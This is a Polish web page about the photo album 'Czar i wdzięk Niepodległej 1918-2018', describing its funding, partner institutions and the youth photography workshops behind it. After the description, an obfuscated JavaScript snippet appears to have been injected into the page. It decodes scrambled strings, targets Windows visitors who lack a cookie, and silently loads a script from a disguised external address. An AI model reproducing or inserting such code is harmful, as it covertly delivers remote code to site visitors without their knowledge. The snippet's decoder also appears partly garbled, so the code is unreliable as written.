Album "Czar i wdzięk Niepodległej 1918-2018"

Wydanie albumu było możliwe dzięki dofinansowaniu ze środków Programu Wieloletniego NIEPODLEGŁA na lata 2017-2022 w ramach programu dotacyjnego "Niepodległa".  Album jest wynikiem wielomiesięcznej pracy zbiorczej kilku podmiotów: Muzeum Pałacu w Wilanowie, Wyższej Szkoły Artystycznej w Warszawie, Zespołu Szkół Fototechnicznych, Studio F4, Fundacji im. Królowej Marii Kazimiery oraz programu Debiutantki. Zdjęcia prezentowane w tym albumie pochodzą z wystawy „Czar i wdzięk Niepodległej 1918-2018”, która miała miejsce w Oranżerii Muzeum Pałacu w Wilanowie, w październiku 2018 . Wydarzenie to było kolejnym działaniem zainicjowanym przez program „Debiutantki”, które miało upamiętnić stulecie odzyskania niepodległości przez Polskę. Fotografie powstawały w czasie wielu warsztatów fotograficznych  realizowanych m. in. podczas Nocy Muzeów 2018 w Wilanowie oraz w Stajni Salerno. Uczestnicy warsztatów – uczniowie Zespołu Szkół Fototechnicznych, pomimo młodego wieku, potrafili dostrzec i uchwycić to, co było kwintesencją klimatu lat 20. i 30. ubiegłego wieku. Fotografie przedstawiają uczestniczki różnych edycji programu „Debiutantki”, tancerzy ZPiT UW „Warszawianka” oraz statystów. Charakteryzację z epoki międzywojennej i kostiumy inspirowane modą lat 20. i 30. XX wieku zapewniły studentki Wyższej Szkoły Artystycznej (pod kierunkiem Aleksandry Plewako-Szczerbińskiej i opieką artystyczną Agaty Manowskiej) oraz Katarzyna Markiewicz - Costume & Makeup designer.

 

;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();

▲ Góra strony